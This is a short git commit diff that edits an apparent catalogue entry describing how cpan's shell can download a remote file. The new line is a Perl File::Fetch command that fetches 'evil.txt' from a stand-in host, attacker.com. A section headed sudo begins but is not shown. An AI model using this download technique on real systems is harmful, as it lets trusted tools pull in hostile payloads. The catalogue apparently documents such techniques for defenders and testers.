variable fix

This commit is contained in:
Shaksham Jaiswal 2018-11-08 15:35:39 +00:00 committed by Emilio
parent f6d6019515
commit 754e5e0f95

View File

@ -23,10 +23,9 @@ functions:
file-download: file-download:
- description: Fetch a remote file via HTTP GET request and store it in PWD. - description: Fetch a remote file via HTTP GET request and store it in PWD.
code: | code: |
export RHOST=attacker.com export URL=http://attacker.com/evil.txt
export DFILE=evil.txt
cpan cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "http://$ENV{RHOST}/$ENV{DFILE}"))->fetch(); ! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
sudo: sudo:
- code: | - code: |